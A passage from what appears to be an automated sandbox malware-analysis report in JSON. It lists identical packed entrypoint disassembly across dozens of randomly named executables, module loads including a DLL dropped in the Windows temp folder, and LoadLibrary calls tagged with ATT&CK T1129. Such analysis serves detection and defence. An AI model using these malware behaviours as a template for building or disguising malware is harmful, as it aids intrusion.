0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"028260.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tfdbnrd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rjrvvt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"blnxt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tnvhlh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ljhdxt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"82426.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"28646.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"228864.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8402266.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"088422.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"ptnfvbx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"ptnfvbx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ptnfvbx.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"ptnfvbx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ptnfvbx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"lbxbhh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"vplpt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"vplpt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vplpt.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"vplpt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vplpt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"xdpjtxl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"xdpjtxl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xdpjtxl.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"xdpjtxl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xdpjtxl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"nxpbdf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"nxpbdf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nxpbdf.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"nxpbdf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nxpbdf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"800866.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"800866.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"800866.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"800866.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"482606.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"482606.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"482606.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"482606.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"482606.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"482606.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"drrxb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"drrxb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"drrxb.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"drrxb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"drrxb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"ldlfr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"ldlfr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ldlfr.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"ldlfr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ldlfr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"4042240.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"rfhxbp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"rfhxbp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rfhxbp.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"rfhxbp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fhftdj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"fhftdj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fhftdj.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"fhftdj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fhftdj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"442602.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"442602.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"442602.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"442602.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"442602.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"8460680.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"8460680.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8460680.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"8460680.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8460680.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"xbbfdpr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"nblht.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"nblht.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nblht.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"nblht.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nblht.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"vfpfhn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"vfpfhn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vfpfhn.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"vfpfhn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vfpfhn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"hrrxd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"hbdtpx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"hbdtpx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hbdtpx.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"hbdtpx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hbdtpx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"44244.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"44244.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"44244.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"44244.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"44244.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"60448.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"60448.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"60448.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"60448.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"60448.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"dtvthvj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"dtvthvj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dtvthvj.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"dtvthvj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tlxfnh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"tlxfnh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tlxfnh.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"tlxfnh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fnpdnrn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"fnpdnrn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fnpdnrn.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"fnpdnrn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fnpdnrn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"840882.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"840882.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"840882.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"840882.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"840882.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"8082460.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"8082460.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8082460.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"8082460.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8082460.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"8082460.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"042028.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"042028.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"042028.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"042028.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"042028.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"22866.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"084242.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"084242.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"084242.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"084242.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"084242.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"084242.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"lxrvjtr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"lxrvjtr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lxrvjtr.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"lxrvjtr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lxrvjtr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"dpbtn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"dpbtn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dpbtn.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"dpbtn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dpbtn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"dvrdv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"dvrdv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dvrdv.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"dvrdv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dvrdv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"flxrvf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"flxrvf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"flxrvf.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"flxrvf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"flxrvf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"406266.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"464224.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"464224.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"464224.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"464224.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"464224.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b780000\n \"088422.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"8402266.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75420000\n \"28646.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71270000\n \"28646.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"28646.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"28646.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"ptnfvbx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"lbxbhh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"vplpt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"xdpjtxl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"nxpbdf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"8080888.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"800866.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"4400860.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"8442880.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"482606.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"drrxb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"ldlfr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"00226.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"28886.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"4042240.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"42068.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"6028624.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"rbtft.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"rfhxbp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"fhftdj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"2886400.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"442602.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"8460680.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000\n \"xbbfdpr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"ptnfvbx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005896)\n \"ptnfvbx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005896)\n \"vplpt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005840)\n \"vplpt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005840)\n \"vplpt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005840)\n \"vplpt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005840)\n \"xdpjtxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006048)\n \"xdpjtxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006048)\n \"xdpjtxl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006048)\n \"xdpjtxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006048)\n \"nxpbdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006000)\n \"nxpbdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006000)\n \"nxpbdf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006000)\n \"nxpbdf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006000)\n \"800866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006132)\n \"800866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006132)\n \"800866.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006132)\n \"800866.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006132)\n \"482606.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006020)\n \"482606.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 